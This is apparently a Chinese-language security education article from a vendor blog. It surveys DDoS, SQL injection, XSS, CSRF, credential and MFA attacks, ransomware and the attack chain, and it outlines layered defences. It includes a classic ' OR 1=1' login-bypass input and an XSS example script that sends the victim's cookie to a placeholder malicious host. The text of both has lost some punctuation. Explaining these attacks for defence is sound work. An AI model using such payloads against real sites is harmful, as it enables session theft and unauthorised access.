ARTICLE · INTELLIGENCE

战地情报 · 详情页

来自尧图项目组的一线实战观察与深度解析

网站与App攻击科普:从DDoS到应用层漏洞的完整解析

网站与App攻击科普:从DDoS到应用层漏洞的完整解析 一、攻击者在攻击什么网站和App是用户直接接触的服务入口也是攻击者最常瞄准的目标。攻击者盯上的无非是三样东西数据。用户凭证、个人信息、交易记录、商业机密——这些数据在地下市场有明确的交易价值。服务可用性。让网站或App无法访问可能出于商业竞争、勒索或单纯的破坏目的。系统控制权。获取服务器或应用的控制权限将其作为进一步攻击的跳板或植入后门长期潜伏。理解这个前提再看各种攻击类型就能明白它们分别瞄准的是哪一个目标。二、DDoS攻击让服务“忙不过来”2.1 基本原理DDoS分布式拒绝服务攻击的核心逻辑是用海量无效请求占满目标系统的资源让正常用户无法获得服务。可以把它类比为一群人涌进一家餐馆把菜单上的菜品都点一遍却不付款后厨忙于处理这些无效订单真正想吃饭的顾客反而无法点餐。DDoS的关键特征是分布式——攻击者控制大量分散的设备僵尸网络同时向目标发起请求。这些设备可能分布在全球各地包括被感染的服务器、家用路由器、摄像头等物联网设备。2.2 主要类型流量型攻击的目标是占满网络带宽。UDP Flood向目标发送大量UDP数据包ICMP Flood发送大量Ping请求。反射放大攻击则更隐蔽攻击者伪造受害者的IP地址向DNS、NTP等第三方服务器发送小请求这些服务器将放大数十倍甚至数百倍的响应数据发往受害者。协议层攻击利用协议机制缺陷。SYN Flood是最典型的例子攻击者发送大量伪造源IP的SYN请求但不完成TCP三次握手服务器为每个请求分配资源等待确认大量半开连接最终占满连接队列。应用层攻击模拟正常用户行为。HTTP Flood发送大量看似合法的GET或POST请求耗尽Web服务器的处理能力。由于这些请求与正常用户请求难以区分传统的流量清洗设备往往难以识别。2.3 防御思路DDoS防御需要分层部署流量清洗设备在入口处过滤恶意流量CDN将攻击流量分散到多个节点弹性带宽在攻击期间动态扩容WAF在应用层识别和拦截异常请求。三、Web应用攻击利用代码和配置的弱点3.1 SQL注入SQL注入的原理是Web应用未对用户输入做充分过滤攻击者将恶意SQL语句注入到输入参数中后端服务器将恶意输入拼接到SQL语句中执行。举例来说一个登录接口的SQL查询可能是sqlSELECT * FROM users WHERE username 输入的用户名 AND password 输入的密码如果攻击者在用户名输入框中填入 OR 11查询条件就变成了恒真条件攻击者可能绕过密码验证直接登录。SQL注入的根本原因是代码与数据未做隔离——应用直接将用户可控输入拼接到SQL语句中数据库将恶意输入当作SQL指令执行。防御的核心是使用参数化查询确保用户输入始终被当作数据处理。3.2 XSS跨站脚本攻击XSS的攻击目标是其他用户而非服务器本身。攻击者向Web页面注入恶意JavaScript脚本当其他用户访问该页面时脚本在用户浏览器中自动执行。例如一个评论功能如果未对用户输入做转义攻击者可以在评论中嵌入htmlscriptdocument.locationhttp://恶意站点/steal?cookiedocument.cookie/script当其他用户查看这条评论时脚本执行用户的Cookie被发送到攻击者控制的服务器。攻击者可以利用窃取的Cookie冒充用户身份。XSS分为存储型恶意脚本存入数据库、反射型脚本通过URL参数反射和DOM型客户端脚本处理不当。存储型XSS危害范围最广因为所有访问该页面的用户都会受到影响。3.3 CSRF跨站请求伪造CSRF利用的是用户已登录目标网站的身份。攻击者诱导用户点击一个链接或访问一个页面该页面会自动向目标网站发起请求如转账、修改密码而浏览器会自动携带用户的Cookie。防御CSRF的核心是Token校验服务器在表单中嵌入一个随机Token提交时验证Token是否匹配。攻击者无法预测Token值因此无法构造有效的恶意请求。四、身份与凭证攻击不攻破系统直接“登录”2026年的威胁数据显示身份弱点在近90%的调查事件中发挥了实质性作用。攻击者越来越多地不是“闯入”系统而是使用被盗的凭证和令牌“登录”系统。凭证填充是常见手法攻击者利用从其他数据泄露中获得的用户名和密码组合尝试登录目标系统。由于许多用户在多个平台重复使用密码这种攻击的有效性相当高。MFA绕过是另一个值得关注的方向。攻击者通过持续发送MFA请求“MFA轰炸”直到用户因厌烦而批准。更隐蔽的方式是攻击者自行注册受控的MFA设备从而以合法身份出现。五、恶意软件与勒索攻击勒索软件加密目标系统的文件或锁定系统要求支付赎金。最新变种呈现“先窃密、后加密”的双重施压模式——即使支付赎金数据仍可能被公开。入侵渠道包括漏洞爆破、邮件附件、远程桌面弱口令等。蠕虫病毒与普通病毒的最大区别是无需人为操作即可主动传播。利用系统漏洞、局域网共享或弱口令扫描一台设备中招可能导致全网沦陷。木马程序通常伪装成正常软件用户运行后在其不知情的情况下执行恶意操作。常见的传播方式包括钓鱼邮件附件、伪装成常用工具的下载包等。六、攻击链的典型阶段一次完整的网络攻击通常遵循一定的阶段划分侦察阶段攻击者收集目标信息包括网络拓扑、开放端口、使用的软件版本、员工信息等。初始访问通过钓鱼邮件、漏洞利用、弱口令爆破等方式获得初步访问权限。2026年Verizon DBIR报告指出利用软件漏洞已超越使用被盗密码成为首次入侵系统的主要途径31%的数据泄露事件源于漏洞利用。权限提升与横向移动获得初步访问后攻击者尝试提升权限并在内网横向移动寻找更有价值的目标。数据窃取或加密最终目标可能是窃取数据、加密文件或破坏系统。Palo Alto Networks的报告显示最快的情况下攻击者从初始访问到数据外泄仅需72分钟比前一年快了4倍。七、防御的基本思路针对网站和App的攻击防御需要覆盖多个层面网络层流量清洗、DDoS防护、CDN加速。应用层WAFWeb应用防火墙、输入验证、参数化查询、输出转义。身份层强密码策略、多因素认证、会话管理、异常登录检测。终端层端点检测与响应、防病毒、补丁管理。数据层加密存储、访问控制、备份与恢复。管理层面安全开发流程、定期渗透测试、应急响应预案。需要留意的是攻击面在持续迁移。2025年OWASP Top 10中访问控制失效持续位居榜首安全配置错误和软件供应链失效跃升至第二、第三位传统的注入攻击排名有所下降。防御重心需要从“修补代码漏洞”扩展到“管理配置和供应链信任”。八、总结网站和App攻击的核心逻辑可以归纳为三个方向让服务不可用DDoS攻击通过海量请求耗尽资源使正常用户无法访问。窃取数据或控制权SQL注入、XSS、凭证填充等攻击利用代码漏洞或身份弱点获取敏感数据或系统权限。破坏完整性勒索软件、木马、蠕虫等恶意软件篡改数据或加密文件造成业务中断和数据损失。理解这些攻击的原理和特征是构建有效防御体系的前提。攻击面在变化防御策略也需要随之调整——从单一的边界防护转向覆盖网络、应用、身份、终端的纵深防御。
RELATED READING

延伸阅读

更多一线实战笔记与深度复盘,助您持续精进